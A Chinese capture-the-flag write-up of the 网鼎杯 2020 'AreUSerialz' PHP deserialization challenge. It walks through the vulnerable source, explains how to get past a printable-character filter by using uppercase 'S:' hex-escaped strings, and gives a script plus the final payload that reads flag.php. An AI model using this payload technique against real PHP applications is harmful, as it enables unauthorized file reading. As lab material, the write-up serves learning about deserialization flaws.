[网鼎杯 2020 青龙组]AreUSerialz

源代码关键部分分析

php 复制代码
if(isset( $ _GET['str'])) {
     $ str = (string) $ _GET['str'];
    if(is_valid( $ str)) {
         $ obj = unserialize( $ str);
    }
}

function is_valid( $ s) {
    for ( $ i = 0;  $ i < strlen( $ s);  $ i++) 
        if (!(ord( $ s[ $ i]) >= 32 && ord( $ s[ $ i]) <= 125)) 
            return false;
    return true;
}

is_valid()函数

检查字符串中每个字符的ASCII码是否在32-125范围内(可打印字符)。

if(isset( $ _GET['str']))函数:

传入点为str

关键类分析

php 复制代码
class FileHandler {
    protected  $ op;
    protected  $ filename;
    protected  $ content;
    
    function __construct() {
         $ this->op = "1";
         $ this->filename = "/tmp/tmpfile";
         $ this->content = "Hello World!";
         $ this->process();
    }
    
    public function process() {
        if( $ this->op == "1") {
             $ this->write();
        } else if( $ this->op == "2") {
             $ res =  $ this->read();
             $ this->output( $ res);
        } else {
             $ this->output("Bad Hacker!");
        }
    }
    
    private function read() {
        return file_get_contents( $ this->filename);
    }
    
    private function output( $ s) {
        echo "[Result]: <br>" .  $ s;
    }
}

利用点:

op = "2"时,会调用read()方法读取 filename指定的文件。

FileHandler类的protected属性输出的时候会在变量名前面加上%00*%00,其ascii码值为0,会触发is_valid()检查,导致终止输入。

故我们现在有了目标:

构造一个反序列化对象,设置 op = "2"和 filename = "flag.php"。

把序列化后生成的%00改为它的url编码\00

并将小写的s: 替换为大写的**S:**输出,利用大写S采用的16进制,来绕过is_valid中对空字节的检查。

PHP序列化字符串中

s:(小写)表示字符串长度,会被PHP解析为十进制。

S:(大写)表示字符串长度,PHP会将其解释为十六进制。

构造脚本

php 复制代码
<?php
class FileHandler
{
    protected $op=2;
    protected $filename="flag.php";
    protected $content;
}
$a=new FileHandler();
$b=serialize($a);
$b = str_replace(chr(0), '\00', $b);
$b = str_replace('s:','S:', $b);
echo $b;

运行后得到序列化字符串

php 复制代码
O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";N;}

通过str注入点注入靶机

查看源代码便能找到flag

参考

[网鼎杯 2020 青龙组]AreUSerialz

相关推荐
多仔ヾ2 小时前
PHP 基础案例教程之 04-数组
php
多仔ヾ2 小时前
PHP 基础案例教程之 03-函数
php
百***07453 小时前
小米MiMo-V2-Flash深度解析:国产开源大模型标杆+一步API接入全指南
java·大数据·开源·php
刃神太酷啦3 小时前
Linux 基础 IO 收官:库的构建与使用、进程地址空间及核心知识点全解----《Hello Linux!》(11)
java·linux·c语言·数据库·c++·算法·php
开开心心就好3 小时前
视频伪装软件,.vsec格式批量伪装播放专用
java·linux·开发语言·网络·python·电脑·php
weixin_BYSJ19874 小时前
django农作物批发交易系统--附源码24008
java·javascript·spring boot·python·django·flask·php
计算机毕业设计开发4 小时前
django高校公寓管理系统--附源码64226
java·c++·spring boot·python·spring cloud·django·php
Physicist in Geophy.5 小时前
b-value explain by first principle
开发语言·php
darkb1rd5 小时前
PHP核心特性与安全机制概述
安全·php